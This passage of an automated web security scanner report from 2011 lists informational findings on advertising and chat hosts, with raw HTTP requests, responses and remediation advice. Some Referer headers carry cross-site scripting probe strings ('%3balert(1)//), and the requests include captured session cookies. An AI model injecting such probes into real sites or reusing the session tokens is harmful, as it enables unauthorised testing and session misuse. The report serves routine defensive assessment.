:"Address","hdnMatchedAddress":"100 Carriage Cir, Hemet, CA 92545-9610","hdnEditedLocationUTC":"","hdnEditedPropertyUTC":"","hdnInputModified":""},{"hdnLatitude":"-121.386436118168","hdnLongitude":"38.4025337027216","hdnEntityID":"932","hdnDealerId":"3773","hdnRegionCode":"44","hdnDistrict":"12","hdnDealerName":"NISSAN OF ELK GROVE","hdnDealerStreet":"8590 LAGUNA GROVE DR","hdnDealerCity":"ELK GROVE","hdnDealerS
...[SNIP]...
Distance":"13.788277579171012","hdnMake":"Nissan","hdnActive":"true","hdnOwnerfirst":"true","hdnPrefered":"true","hdnExcellenceCode":"2","hdnExpressService":"false","hdnGTR":"true","hdnSTLatitude":"38.4025337027216","hdnSTLongitude":"-121.386436118168","hdnContactable":"true","hdnSalesphone":"","hdnServicephone":"(916) 405-5000","hdnSalesHours":"SUSU11001900:MOFR09002100:SASA09002000","hdnServiceHours":"SUSUCLOS
...[SNIP]...

24. Robots.txt file
There are 2 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


24.1. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 16:39:29 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /


24.2. https://tt3.zedo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tt3.zedo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tt3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sat, 29 Jan 2011 01:41:21 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

25. Cacheable HTTPS response

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hcp/html/blankhtml.html

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /hcp/html/blankhtml.html HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/html
Content-Location: https://base.liveperson.net/hcp/html/blankhtml.html
Last-Modified: Thu, 30 Dec 2010 17:06:51 GMT
Accept-Ranges: bytes
ETag: "e28dbf343a8cb1:112a"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 14:06:46 GMT

<html><body></body></html>

26. Multiple content types specified
There are 3 instances of this issue:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


26.1. http://base.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://base.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /visitor/addons/deploy.asp?site=5296924&d_id=1 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:59:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-type: application/x-javascript
max-age: 1800
Last-Modified: Fri, 07 Jan 2011 16:10:14 GMT
Content-Length: 16698
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; path=/
Cache-control: public

lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=globalUtils,inputboxHandler
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}

lpMTagConfig.plugins[
...[SNIP]...

26.2. https://base.liveperson.net/hcp/html/chatConnLib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hcp/html/chatConnLib.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /hcp/html/chatConnLib.js HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Content-Length: 23454
Content-Type: application/x-javascript
Content-Location: https://base.liveperson.net/hcp/html/chatConnLib.js
Last-Modified: Thu, 30 Dec 2010 17:12:16 GMT
Accept-Ranges: bytes
ETag: "f2555cb544a8cb1:112a"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 14:06:46 GMT

if(typeof Array.prototype.splice==='undefined'){Array.prototype.splice=function(a,c){var i=0,e=arguments,d=this.copy(),f=a;if(!c){c=this.length-a;}for(i;i<e.length-2;i++){this[a+i]=e[i+2];}for(a;a<thi
...[SNIP]...
<head>';out_str+="<meta http-equiv='Content-Type' content='text/html; charset="+this.dataEncoding+"'>";out_str+='</head>
...[SNIP]...

26.3. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE HTTP/1.1
Host: hosted.ap.org
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/javascript
Vary: Accept-Encoding
Expires: Fri, 28 Jan 2011 21:57:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 21:57:28 GMT
Connection: close
Content-Length: 8304

document.write( '<!--GLOBAL FALSE FOR PROXY-PARTIAL-->');
document.write( '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">');
...[SNIP]...
<head>');
document.write( ' <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"/>');
document.write( ' <link rel="stylesheet" type="text/css" href="http://ibd.morningstar.com/AP/graph.css"/>
...[SNIP]...

27. HTML does not specify charset
There are 144 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


27.1. http://a.tribalfusion.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=arn7TwNZaiMt6memCmGwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bWalbfCPvRr5pHFJ2IiiqvUj8gL5UKMojsRtkyGv3iLgZdLhJWNtFwIaQqSDUhJXcolRQQftgBRpZbqFL3j1LmZaRLgOPqeE7bMdTEIGxtZdfM5WI7wWtsmYZaJOJkAibgqRMFJEdwIqaWU9WeZd8ntA03ww6cnyXOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNZb3ZbqSUdhKTLyZaa4ZcFGHeZbVThMfN8pnAYOeBZbsKVSfraRuvG30PErMalZa5

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: keep-alive

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.2. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Request

GET /j.ad HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.3. http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

Request

GET /p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 336

<script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3O
...[SNIP]...

27.4. http://a.tribalfusion.com/p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html

Request

GET /p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 390

<IFRAME src="http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF
...[SNIP]...

27.5. http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html

Request

GET /p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 220

<html>
<head>
</head>
<body>
<TABLE height="100%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr><td height="20%"></td>
<TR>
<TD vAlign=center align=middle>

</TR>
</TABL
...[SNIP]...

27.6. http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html/

Request

GET /p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 404 Not Found
X-Function: 413
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.7. http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad.html/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad.html/

Request

GET /p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad.html/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 404 Not Found
X-Function: 413
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

27.8. http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html

Request

GET /p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aQnfFNo0P8p8mTNj3OUZaaM0s7a0EnHEnP443sV4OxG24fZdFVF4WrXx3GaavnqGbacELgIg0cxBWwGCMCyE5R8BgUkAwwP7W4Lf15AXoGpDPEm2uWhogBbBeFtS3sNujhqcL8IypEFnMyY5rjwfdhPtkvPv5kiSYSLxx0yBZdaPvy43sI47rgYUZbuw9p7utbuxP3osZabh7jeVbmx4mSseNAqv5Zb5wZbj4QZdowyKncgsZak1kw2kFpHKqoGDFjaHdRdTSxieSPAV7ZbB4l9rNqQJyrSH6b2PjFXEWhPGO0nWtZda9fXYcnNNbuQKDH8yw2ctKVHpZdQBZaZdYNd4raNbLgQDCuZdWy59p5QQwsVvj2CCedXmmMZd7bPdbWab2pTN7L0u6KN19wCo33RHMZdXGw6lGZbUXDVkGZa6OOEfZceWieIsCwGBhZdOpj7bSZaQItcodsYVZbT2FCUiPXGvOEJWGML

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 220

<html>
<head>
</head>
<body>
<TABLE height="100%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr><td height="20%"></td>
<TR>
<TD vAlign=center align=middle>

</TR>
</TABL
...[SNIP]...

